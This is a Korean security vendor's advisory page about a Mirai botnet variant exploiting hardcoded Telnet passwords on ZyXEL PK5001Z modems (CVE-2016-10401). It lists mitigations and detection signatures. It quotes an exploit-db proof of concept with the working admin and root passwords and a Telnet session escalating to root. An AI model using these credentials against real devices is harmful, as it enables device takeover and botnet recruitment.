윈스

검색창 바로가기
블로그 비쥬얼 바로가기
메뉴 바로가기
본문내용 바로가기
푸터바로가기

윈스 홈페이지

보안 정보

앞 내용 보기

다음 내용 보기

보안 동향 ㅣ 화웨이 안드로이드, Joker 악성 코드 50만대 이상 감염

침해사고분석팀ㅣ2021.04.12
보안 동향 ㅣ APKPure 스토어 애플리케이션에서 안드로이드 멀웨어 발견

침해사고분석팀ㅣ2021.04.12
보안 동향 ㅣ IcedID 멀웨어, 기업 연락 양식으로 퍼진다

침해사고분석팀ㅣ2021.04.12
취약점 정보 ㅣ [CVE-2019-6263] Joomla CMS Filter_Tags XSS

침해사고분석팀ㅣ2021.04.09
취약점 정보 ㅣ [CVE-2019-9053] CMS Made Simple SQL Injection

침해사고분석팀ㅣ2021.04.09

모집공고관련 내용
취약점 정보ZYXEL PK5001Z 라우터취약점을 이용하는 새로운 Mirai봇넷
작성일	2017-11-29	조회	2752
♦ZYXEL PK5001Z 라우터취약점(CVE-2016-10401)을 이용하는 새로운 Mirai봇넷♦ ZyXEL PK5001Z Modem에 저장된 Default Password를 통해 관리자 권한을 탈취할 수 있다. IoT Botnet은 ZyXEL PK5001Z Modem을 스캔해 Default Password를 입력하는 공격이 가능하다. 공격에 성공하면 ZyXEL PK5001Z 장치는 su 암호로 zyad5001을 사용하므로 루트 암호 없이 관리자 계정을 얻을 수 있다. 공격자는 백도어를 설치해, 기기의 제어권을 획득한다. 최초 발견한 360네트워크 시큐리티 팀에 의하면 두종류의 admin계정과 23,2323포트를 타겟으로 봇들의 공격이 집중적으로 발생했으며, 주요 대상은 아르헨티나로 알려졌다고 한다. < 출처 : http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickly-on-port-23-and-2323-en/ > < 출처 : http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickly-on-port-23-and-2323-en/ > 현재 이 새로운 Bot은 국내에도 다수 기기에 공격을 진행하고 있는것이 관찰되고 있어 주의가 요망된다. 공개된 POC 코드 Admin 계정으로 접속한 공격자는 공개된 SuperUser 계정 패스워드 (password: zyad5001)를 통해 관리자 권한을 탈취할 수 있다. # Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. # Google Dork: n/a # Date: 2017-10-31 # Exploit Author: Matthew Sheimo # Vendor Homepage: https://www.zyxel.com/ # Software Link: n/a # Version: PK5001Z 2.6.20.19 # Tested on: Linux # About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. # Linked CVE's: CVE-2016-10401 Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet username: admin password: CenturyL1nk Escalate to root with 'su' and this password. password: zyad5001 [root:/]# telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. PK5001Z login: admin Password: CenturyL1nk $ whoami admin_404A03Tel $ su Password: zyad5001 # whoami root # uname -a Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo Vendor Name: ZyXEL Communications Corp. < 출처 : https://www.exploit-db.com/exploits/43105/ > 해결방안 1. Default 계정정보를 변경한다. 2. 주기적으로 계정정보를 변경한다. 3. 불필요한 사용자의 접근을 차단한다. [Wins Sniper] - [3862] ZyXEL PK5001Z Modem Default Password - [3863] ZyXEL PK5001Z Modem Default Password.A - [3864] ZyXEL PK5001Z Modem Default Password(TCP-2323) - [3865] ZyXEL PK5001Z Modem Default Password.A(TCP-2323) [Wins UTM] - [805374307] ZyXEL PK5001Z Modem Default Password - [805374308] ZyXEL PK5001Z Modem Default Password.A - [805374309] ZyXEL PK5001Z Modem Default Password(TCP-2323) - [805374310] ZyXEL PK5001Z Modem Default Password.A(TCP-2323) [Wins APTX] - [3066] ZyXEL PK5001Z Modem Default Password - [3067] ZyXEL PK5001Z Modem Default Password.A - [3068] ZyXEL PK5001Z Modem Default Password(TCP-2323) - [3069] ZyXEL PK5001Z Modem Default Password.A(TCP-2323) source https://forum.openwrt.org/viewtopic.php?id=62266 https://www.exploit-db.com/exploits/43105/ http://blog.netlab.360.com/early-warning-a-new-mirai-variant-is-spreading-quickly-on-port-23-and-2323-en/
첨부파일	첨부파일이 없습니다.

태그	ZyXEL PK5001Z CVE-2016-10401 mirai botnet